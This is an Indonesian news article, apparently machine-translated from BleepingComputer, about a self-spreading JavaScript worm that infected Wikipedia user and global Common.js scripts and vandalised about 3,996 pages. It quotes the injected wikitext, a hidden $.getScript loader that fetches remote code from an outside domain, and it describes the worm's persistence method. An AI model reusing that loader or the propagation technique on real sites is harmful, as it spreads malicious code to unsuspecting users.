Wikipedia terkena worm JavaScript yang menyebarkan dirinya sendiri dan merusak halaman-halamannya

Wikimedia Foundation mengalami insiden keamanan hari ini setelah worm JavaScript yang menyebar sendiri mulai merusak halaman dan memodifikasi skrip pengguna di beberapa wiki.

Editor pertama kali melaporkan kejadian tersebut di Wikipedia Pompa Desa (teknis)saat pengguna melihat sejumlah besar pengeditan otomatis yang menambahkan skrip tersembunyi dan vandalisme ke halaman acak.

Insinyur Wikimedia untuk sementara membatasi pengeditan di seluruh proyek sementara mereka menyelidiki serangan tersebut dan mulai mengembalikan perubahan.

Cacing JavaScript

Menurut Phabricator Wikimedia pelacak masalahtampaknya insiden tersebut dimulai setelah skrip berbahaya yang dihosting di Wikipedia Rusia dieksekusi, sehingga menyebabkan skrip JavaScript global di Wikipedia dimodifikasi dengan kode berbahaya.

Skrip berbahaya disimpan di User:Ololoshka562/test.js[[Arsip], pertama kali diunggah pada Maret 2024 dan diduga terkait dengan skrip yang digunakan dalam serangan sebelumnya terhadap proyek wiki.

Berdasarkan riwayat penyuntingan yang ditinjau oleh BleepingComputer, skrip tersebut diyakini telah dieksekusi untuk pertama kalinya oleh akun karyawan Wikimedia hari ini saat menguji fungsionalitas skrip pengguna. Saat ini tidak diketahui apakah skrip tersebut dijalankan dengan sengaja, tidak sengaja dimuat selama pengujian, atau dipicu oleh akun yang disusupi.

Tinjauan BleepingComputer terhadap skrip test.js yang diarsipkan menunjukkan bahwa skrip tersebut menyebar sendiri dengan menyuntikkan pemuat JavaScript berbahaya ke common.js pengguna yang masuk dan MediaWiki:Common.js global Wikipedia, yang digunakan oleh semua orang.

MediaWiki mengizinkan berkas JavaScript global dan khusus pengguna, seperti MediaWiki:Common.js dan Pengguna:/common.js, yang dijalankan di browser editor untuk menyesuaikan antarmuka wiki.

Setelah skrip test.js awal dimuat di browser editor yang masuk, skrip tersebut mencoba mengubah dua skrip menggunakan sesi dan hak istimewa editor tersebut:

• Kegigihan tingkat pengguna: itu mencoba menimpa Pengguna:/common.js dengan pemuat yang secara otomatis memuat skrip test.js setiap kali pengguna menelusuri wiki saat masuk.
• Kegigihan di seluruh situs: Jika pengguna mempunyai hak istimewa yang tepat, ia juga akan mengedit skrip global MediaWiki:Common.js, sehingga dapat dijalankan untuk setiap editor yang menggunakan skrip global.

Jika skrip global berhasil diubah, siapa pun yang memuatnya akan secara otomatis menjalankan pemuat, yang kemudian akan mengulangi langkah yang sama, termasuk menginfeksi common.js mereka sendiri, seperti yang ditunjukkan di bawah ini.

Skrip ini juga menyertakan fungsionalitas untuk mengedit halaman acak dengan memintanya melalui Spesial: Acak perintah wiki, lalu mengedit halaman untuk menyisipkan gambar dan pemuat JavaScript tersembunyi berikut.

  [[File:Woodpecker10.jpg|5000px]]    [[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]  

Menurut analisis BleepingComputer, sekitar 3.996 halaman telah dimodifikasi, dan sekitar 85 pengguna file common.js mereka diganti selama insiden keamanan. Tidak diketahui berapa banyak halaman yang dihapus.

Saat worm menyebar, para insinyur untuk sementara waktu membatasi pengeditan di seluruh proyek sambil mengembalikan perubahan berbahaya dan menghapus referensi ke skrip yang disuntikkan.

Selama pembersihan, anggota staf Yayasan Wikimedia juga menghapuskan common.js untuk banyak pengguna di seluruh platform. Halaman yang dimodifikasi ini kini telah “disembunyikan” dan tidak lagi terlihat di riwayat perubahan.

Pada saat penulisan, kode yang dimasukkan telah dihapus, dan pengeditan dapat dilakukan kembali.

Namun, Wikimedia belum menerbitkan laporan rinci pasca-insiden yang menjelaskan secara pasti bagaimana skrip yang tidak aktif tersebut dieksekusi atau seberapa luas worm tersebut menyebar sebelum dibendung.

BleepingComputer menghubungi Wikimedia dengan pertanyaan tentang kejadian tersebut, namun belum menerima balasan saat ini.